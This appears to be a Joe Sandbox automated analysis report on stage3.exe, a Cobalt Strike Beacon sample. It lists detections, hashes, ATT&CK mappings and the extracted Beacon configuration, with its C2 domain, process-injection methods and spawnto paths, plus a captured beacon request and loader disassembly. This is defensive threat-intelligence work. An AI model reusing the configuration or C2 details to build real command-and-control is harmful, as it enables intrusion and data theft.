Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
stage3.exe

Overview

General Information

Sample name:stage3.exe
(renamed file extension from exe_ to exe)
Original sample name:stage3.exe_
Analysis ID:1586954
MD5:6bcd53cbc0a823f553c5105d0ca07ef7
SHA1:9ae14b34badbebbf2dc0ade8f4cb92dce7d66c37
SHA256:5cd6d362eef6962a1222368ff3ac002221f40224490494c27d75b4f3a8a675a2
Infos:

Detection

CobaltStrike
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
PE file has a writeable .text section
Contains functionality to call native functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • stage3.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\stage3.exe" MD5: 6BCD53CBC0A823F553C5105D0CA07EF7)
    • conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 304050, "MaxGetSize": 2139336, "Jitter": 31, "C2Server": "phpsymfony.com,/css3/index2.shtml", "HttpPostUri": "/tools/family.html", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\wbem\\wmiprvse.exe -Embedding", "Spawnto_x64": "%windir%\\sysnative\\wbem\\wmiprvse.exe -Embedding", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "True", "bCFGCaution": "True", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 25577, "ProcInject_PrependAppend_x86": ["REBLQ0xIkGaQDx8AZg8fBAAPHwQADx8ADx8A", "Empty"], "ProcInject_PrependAppend_x64": ["REBLQ0xIkGaQDx8AZg8fBAAPHwQADx8ADx8A", "Empty"], "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread", "SetThreadContext"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": "Host: phpsymfony.com\r\n"}
SourceRuleDescriptionAuthorStrings
stage3.exeJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
    stage3.exeJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000000.2179746172.0000000000401000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
        00000000.00000002.3434549502.0000000000401000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          Process Memory Space: stage3.exe PID: 5644JoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.stage3.exe.400000.0.unpackJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
              0.2.stage3.exe.400000.0.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
                0.0.stage3.exe.400000.0.unpackJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
                  0.0.stage3.exe.400000.0.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
                    No Sigma rule has matched
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: stage3.exeAvira: detected
                    Source: stage3.exeMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 304050, "MaxGetSize": 2139336, "Jitter": 31, "C2Server": "phpsymfony.com,/css3/index2.shtml", "HttpPostUri": "/tools/family.html", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\wbem\\wmiprvse.exe -Embedding", "Spawnto_x64": "%windir%\\sysnative\\wbem\\wmiprvse.exe -Embedding", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "True", "bCFGCaution": "True", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 25577, "ProcInject_PrependAppend_x86": ["REBLQ0xIkGaQDx8AZg8fBAAPHwQADx8ADx8A", "Empty"], "ProcInject_PrependAppend_x64": ["REBLQ0xIkGaQDx8AZg8fBAAPHwQADx8ADx8A", "Empty"], "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread", "SetThreadContext"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": "Host: phpsymfony.com\r\n"}
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: stage3.exeJoe Sandbox ML: detected
                    Source: stage3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: phpsymfony.com
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: GET /css3/index2.shtml?accept=dxKJs6gH4ofAiVSeprcdSa38a5IwcBrYI1fpoKLZa1qInJBaJEPMWED6Ct47l2ciVxCHt-KEOaZ7ITDOTpxC6iOkYQF04UpvBj50kFGpSopROdl80b-4q8r_PoMXlwGH0zx5LyGeO5eQbo2bETT59qsktZZmwF0VT6a04KRJNNU HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Encoding: gzip, deflateAccept-Language: en-US; q=0.7, en; q=0.3Connection: keep-aliveDNT: 1Host: phpsymfony.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cache
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /css3/index2.shtml?accept=dxKJs6gH4ofAiVSeprcdSa38a5IwcBrYI1fpoKLZa1qInJBaJEPMWED6Ct47l2ciVxCHt-KEOaZ7ITDOTpxC6iOkYQF04UpvBj50kFGpSopROdl80b-4q8r_PoMXlwGH0zx5LyGeO5eQbo2bETT59qsktZZmwF0VT6a04KRJNNU HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Encoding: gzip, deflateAccept-Language: en-US; q=0.7, en; q=0.3Connection: keep-aliveDNT: 1Host: phpsymfony.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: phpsymfony.com
                    Source: stage3.exe, 00000000.00000002.3434606956.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://phpsymfony.com/
                    Source: stage3.exe, 00000000.00000002.3434606956.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://phpsymfony.com/css3/index2.shtml?accept=dxKJs6gH4ofAiVSeprcdSa38a5IwcBrYI1fpoKLZa1qInJBaJEPM
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2

                    System Summary

                    barindex
                    Source: stage3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Users\user\Desktop\stage3.exeCode function: 0_2_05C40489 NtProtectVirtualMemory,0_2_05C40489
                    Source: stage3.exeStatic PE information: No import functions for PE file found
                    Source: stage3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: stage3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: stage3.exeStatic PE information: Section .text
                    Source: classification engineClassification label: mal92.troj.evad.winEXE@2/0@1/1
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4236:120:WilError_03
                    Source: stage3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Users\user\Desktop\stage3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\stage3.exe "C:\Users\user\Desktop\stage3.exe"
                    Source: C:\Users\user\Desktop\stage3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: wwanmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeCode function: 0_2_004367A5 push 0000006Ah; retf 0_2_004367BD
                    Source: stage3.exeStatic PE information: section name: .text entropy: 7.162476953082762
                    Source: C:\Users\user\Desktop\stage3.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: stage3.exe, 00000000.00000002.3434606956.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, stage3.exe, 00000000.00000002.3434606956.000000000064C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\stage3.exeNtProtectVirtualMemory: Indirect: 0x5C404E1Jump to behavior
                    Source: C:\Users\user\Desktop\stage3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: stage3.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.2.stage3.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.stage3.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2179746172.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3434549502.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: stage3.exe PID: 5644, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading
                    1
                    Process Injection
                    2
                    Software Packing
                    OS Credential Dumping1
                    Query Registry
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    Abuse Elevation Control Mechanism
                    1
                    Process Injection
                    LSASS Memory1
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    1
                    Abuse Elevation Control Mechanism
                    Security Account Manager2
                    System Information Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive113
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    DLL Side-Loading
                    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
                    Ingress Tool Transfer
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    stage3.exe100%AviraHEUR/AGEN.1318549
                    stage3.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    phpsymfony.com0%Avira URL Cloudsafe
                    https://phpsymfony.com/0%Avira URL Cloudsafe
                    https://phpsymfony.com/css3/index2.shtml?accept=dxKJs6gH4ofAiVSeprcdSa38a5IwcBrYI1fpoKLZa1qInJBaJEPMWED6Ct47l2ciVxCHt-KEOaZ7ITDOTpxC6iOkYQF04UpvBj50kFGpSopROdl80b-4q8r_PoMXlwGH0zx5LyGeO5eQbo2bETT59qsktZZmwF0VT6a04KRJNNU0%Avira URL Cloudsafe
                    https://phpsymfony.com/css3/index2.shtml?accept=dxKJs6gH4ofAiVSeprcdSa38a5IwcBrYI1fpoKLZa1qInJBaJEPM0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    phpsymfony.com
                    188.114.97.3
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://phpsymfony.com/css3/index2.shtml?accept=dxKJs6gH4ofAiVSeprcdSa38a5IwcBrYI1fpoKLZa1qInJBaJEPMWED6Ct47l2ciVxCHt-KEOaZ7ITDOTpxC6iOkYQF04UpvBj50kFGpSopROdl80b-4q8r_PoMXlwGH0zx5LyGeO5eQbo2bETT59qsktZZmwF0VT6a04KRJNNUfalse
                      • Avira URL Cloud: safe
                      unknown
                      phpsymfony.comtrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://phpsymfony.com/css3/index2.shtml?accept=dxKJs6gH4ofAiVSeprcdSa38a5IwcBrYI1fpoKLZa1qInJBaJEPMstage3.exe, 00000000.00000002.3434606956.00000000006AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://phpsymfony.com/stage3.exe, 00000000.00000002.3434606956.00000000006AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      188.114.97.3
                      phpsymfony.comEuropean Union
                      13335CLOUDFLARENETUStrue
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1586954
                      Start date and time:2025-01-09 19:41:10 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:stage3.exe
                      (renamed file extension from exe_ to exe)
                      Original Sample Name:stage3.exe_
                      Detection:MAL
                      Classification:mal92.troj.evad.winEXE@2/0@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 4
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: stage3.exe
                      No simulations
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      188.114.97.3KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                      • www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
                      GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                      • /api/get/dll
                      DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                      • www.uzshou.world/ricr/
                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                      • www.cifasnc.info/8rr3/
                      Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                      • www.cifasnc.info/8rr3/
                      dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                      • /api/get/free
                      dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                      • /api/get/free
                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                      • www.rgenerousrs.store/o362/
                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                      • www.beylikduzu616161.xyz/2nga/
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUShttps://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 104.18.11.207
                      Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                      • 104.21.32.1
                      PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                      • 104.21.80.1
                      SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                      • 104.21.64.1
                      dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 104.21.96.1
                      #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 104.21.96.1
                      fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 104.21.64.1
                      fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 104.21.112.1
                      1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                      • 104.21.96.1
                      jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                      • 104.21.16.1
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      37f463bf4616ecd445d4a1937da06e191C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                      • 188.114.97.3
                      drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                      • 188.114.97.3
                      DyM4yXX.exeGet hashmaliciousVidarBrowse
                      • 188.114.97.3
                      http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                      • 188.114.97.3
                      DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                      • 188.114.97.3
                      xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                      • 188.114.97.3
                      DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                      • 188.114.97.3
                      fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                      • 188.114.97.3
                      Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                      • 188.114.97.3
                      2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                      • 188.114.97.3
                      No context
                      No created / dropped files found
                      File type:PE32+ executable (console) x86-64, for MS Windows
                      Entropy (8bit):7.14805524664819
                      TrID:
                      • Win64 Executable (generic) (12005/4) 66.36%
                      • Win16/32 Executable Delphi generic (2074/23) 11.46%
                      • Generic Win/DOS Executable (2004/3) 11.08%
                      • DOS Executable Generic (2002/1) 11.07%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                      File name:stage3.exe
                      File size:304'128 bytes
                      MD5:6bcd53cbc0a823f553c5105d0ca07ef7
                      SHA1:9ae14b34badbebbf2dc0ade8f4cb92dce7d66c37
                      SHA256:5cd6d362eef6962a1222368ff3ac002221f40224490494c27d75b4f3a8a675a2
                      SHA512:3738203e5c76ff30664a8dca746e9e05837a3b592b28bf80d19047d3d47e82ad900d03fb02ee47d4359ac210e73c1a47b2257e0985710ed6acdb6b9ffbd81c6f
                      SSDEEP:6144:iE+Jx9mLmPbvisHsTfxCFU6PzcdWhgLc67tEp23xgrEE:iE4xMLtoUqzIymtxI23I
                      TLSH:C454F016F6A53DAAFC33863E14634A20BFF37C451BA0EA5B4598212F6D273D46538F21
                      File Content Preview:MZ......................@.......................................Brought to you by SCLauncher....................................PE..d......g......................................@............................................................................
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0x401000
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows cui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x678016E7 [Thu Jan 9 18:35:19 2025 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:
                      Instruction
                      inc ebp
                      xchg ecx, ecx
                      nop dword ptr [eax]
                      xchg edx, edx
                      xchg ebx, ebx
                      inc esi
                      inc edx
                      inc ebx
                      xchg bx, bx
                      dec ecx
                      dec eax
                      nop dword ptr [eax]
                      dec esp
                      xchg dx, dx
                      inc eax
                      nop word ptr [eax+eax]
                      nop
                      xchg cx, cx
                      nop dword ptr [eax]
                      inc ecx
                      nop dword ptr [eax+eax]
                      inc esp
                      nop
                      inc eax
                      inc edi
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      push esp
                      dec ebp
                      push edx
                      inc ebp
                      push ebp
                      dec eax
                      mov ebp, esp
                      dec eax
                      sub esp, 00000020h
                      dec eax
                      lea ebx, dword ptr [FFFFFFEAh]
                      dec eax
                      mov edi, ebx
                      dec eax
                      add ebx, 00016EA4h
                      call ebx
                      inc ecx
                      mov eax, 56A2B5F0h
                      push 00000004h
                      pop edx
                      dec eax
                      mov ecx, edi
                      call eax
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add ah, cl
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], al
                      add byte ptr [edi+77h], dh
                      popad
                      outsb
                      insd
                      insd
                      insb
                      insb
                      add byte ptr [edi-7Bh], ah
                      cmpsd
                      mov esi, dword ptr [ecx]
                      jno 00007F90A9049747h
                      mov seg?, word ptr [esi+09h]
                      out dx, al
                      push edi
                      and eax, 21447811h
                      sub ch, byte ptr [ebp-3Dh]
                      mov ebx, 6B9B3F40h
                      mov esp, E0AF52ECh
                      sbb al, 48h
                      cdq
                      fist word ptr [eax]
                      mov byte ptr [1D014655h], al
                      outsd
                      cli
                      outsb
                      sub eax, 2AEF1C1Bh
                      adc esp, dword ptr [edi+0Eh]
                      xchg dword ptr [edx+3145DC4Fh], eax
                      NameVirtual AddressVirtual Size Is in Section
